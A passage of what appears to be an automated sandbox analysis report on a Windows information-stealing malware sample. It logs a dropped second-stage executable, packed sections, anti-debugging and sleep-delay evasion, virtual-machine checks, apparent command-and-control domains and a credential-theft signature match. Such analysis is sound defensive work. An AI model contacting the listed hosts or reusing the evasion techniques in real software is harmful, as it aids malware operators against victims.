    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeUnpacked PE file: 0.2.g3toRYa6JE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dodomil:W;.tokupec:W;.nujov:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeUnpacked PE file: 3.2.26A5.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.nosu:W;.muwav:W;.roxah:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeUnpacked PE file: 0.2.g3toRYa6JE.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeUnpacked PE file: 3.2.26A5.tmp.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
    Source: g3toRYa6JE.exeStatic PE information: section name: .dodomil
    Source: g3toRYa6JE.exeStatic PE information: section name: .tokupec
    Source: g3toRYa6JE.exeStatic PE information: section name: .nujov
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .nosu
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .muwav
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .roxah
    Source: 26A5.tmp.exe.0.drStatic PE information: section name: .nosu
    Source: 26A5.tmp.exe.0.drStatic PE information: section name: .muwav
    Source: 26A5.tmp.exe.0.drStatic PE information: section name: .roxah
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00410756 push ecx; ret 0_2_00410769
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0040FD82 push ecx; ret 0_2_0040FD95
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0069514C push es; iretd 0_2_0069515D
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0069621C push ds; ret 0_2_00696225
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00699518 pushad ; ret 0_2_00699534
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00699695 push ecx; ret 0_2_006996B2
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00696F09 push 00000003h; ret 0_2_00696F0D
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007909BD push ecx; ret 0_2_007909D0
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007B798F push esp; retf 0_2_007B7997
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007B9DD8 pushad ; retf 0_2_007B9DDF
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007BDDCE push dword ptr [esp+ecx-75h]; iretd 0_2_007BDDD2
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0079CE08 push es; retf 0_2_0079CE0D
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0078FFE9 push ecx; ret 0_2_0078FFFC
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007B7F8D push esp; retf 0_2_007B7F8E
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh3_2_00441853
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_005A8B42 pushad ; ret 3_2_005A8B43
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_005A6B6E push ebx; ret 3_2_005A6B6F
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_005A8BAD pushfd ; ret 3_2_005A8BAE
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_005A7716 push esi; retn 001Ch3_2_005A771A
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0216B05A push ebp; iretd 3_2_0216B05D
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02181AB7 push eax; mov dword ptr [esp], 0E0908DBh3_2_02181ABA
    Source: g3toRYa6JE.exeStatic PE information: section name: .text entropy: 7.54222030802745
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.417548317236182
    Source: 26A5.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.417548317236182
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exeJump to dropped file
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeFile created: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeJump to dropped file
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E96A
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeWindow / User API: threadDelayed 357Jump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeWindow / User API: threadDelayed 9631Jump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65043
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeAPI coverage: 5.1 %
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeAPI coverage: 10.0 %
    Source: C:\Users\user\Desktop\g3toRYa6JE.exe TID: 7956Thread sleep count: 357 > 30Jump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exe TID: 7956Thread sleep time: -257754s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exe TID: 7956Thread sleep count: 9631 > 30Jump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exe TID: 7956Thread sleep time: -6953582s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exe TID: 8024Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007B8C49 FindFirstFileExW,0_2_007B8C49
    Source: Amcache.hve.6.drBinary or memory string: VMware
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: g3toRYa6JE.exe, 00000000.00000002.3872617941.000000000072B000.00000004.00000020.00020000.00000000.sdmp, g3toRYa6JE.exe, 00000000.00000002.3872617941.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789098662.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_004402C0 LdrInitializeThunk,3_2_004402C0
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0042FE4F mov eax, dword ptr fs:[00000030h]0_2_0042FE4F
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00693BDB push dword ptr fs:[00000030h]0_2_00693BDB
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007B00B6 mov eax, dword ptr fs:[00000030h]0_2_007B00B6
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0078092B mov eax, dword ptr fs:[00000030h]0_2_0078092B
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00780D90 mov eax, dword ptr fs:[00000030h]0_2_00780D90
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_005A3A9B push dword ptr fs:[00000030h]3_2_005A3A9B
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_0214092B mov eax, dword ptr fs:[00000030h]3_2_0214092B
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_02140D90 mov eax, dword ptr fs:[00000030h]3_2_02140D90
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0043BBB1 GetProcessHeap,0_2_0043BBB1
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104C3
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00410656 SetUnhandledExceptionFilter,0_2_00410656
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F907
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007AA62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007AA62A
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0079072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0079072A
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007908BD SetUnhandledExceptionFilter,0_2_007908BD
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0078FB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0078FB6E

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: 26A5.tmp.exeString found in binary or memory: robinsharez.shop
    Source: 26A5.tmp.exeString found in binary or memory: handscreamny.shop
    Source: 26A5.tmp.exeString found in binary or memory: chipdonkeruz.shop
    Source: 26A5.tmp.exeString found in binary or memory: versersleep.shop
    Source: 26A5.tmp.exeString found in binary or memory: crowdwarek.shop
    Source: 26A5.tmp.exeString found in binary or memory: apporholis.shop
    Source: 26A5.tmp.exeString found in binary or memory: femalsabler.shop
    Source: 26A5.tmp.exeString found in binary or memory: soundtappysk.shop
    Source: 26A5.tmp.exeString found in binary or memory: skidjazzyric.click
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeProcess created: C:\Users\user\AppData\Local\Temp\26A5.tmp.exe "C:\Users\user\AppData\Local\Temp\26A5.tmp.exe" Jump to behavior
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0041076B cpuid 0_2_0041076B
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,0_2_004351B0
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: EnumSystemLocalesW,0_2_0043B272
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: EnumSystemLocalesW,0_2_0043B2BD
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: EnumSystemLocalesW,0_2_0043B358
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3E5
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,0_2_0043B635
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B75E
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,0_2_0043B865
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B932
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: EnumSystemLocalesW,0_2_00434DBD
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043AFFA
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: EnumSystemLocalesW,0_2_007B5024
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_007BB261
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,0_2_007B5417
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: EnumSystemLocalesW,0_2_007BB4D9
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: EnumSystemLocalesW,0_2_007BB524
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: EnumSystemLocalesW,0_2_007BB5BF
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,0_2_007BB89C
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,0_2_007BB892
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_007BB9C5
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetLocaleInfoW,0_2_007BBACC
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_007BBB99
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103BD
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163DA
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
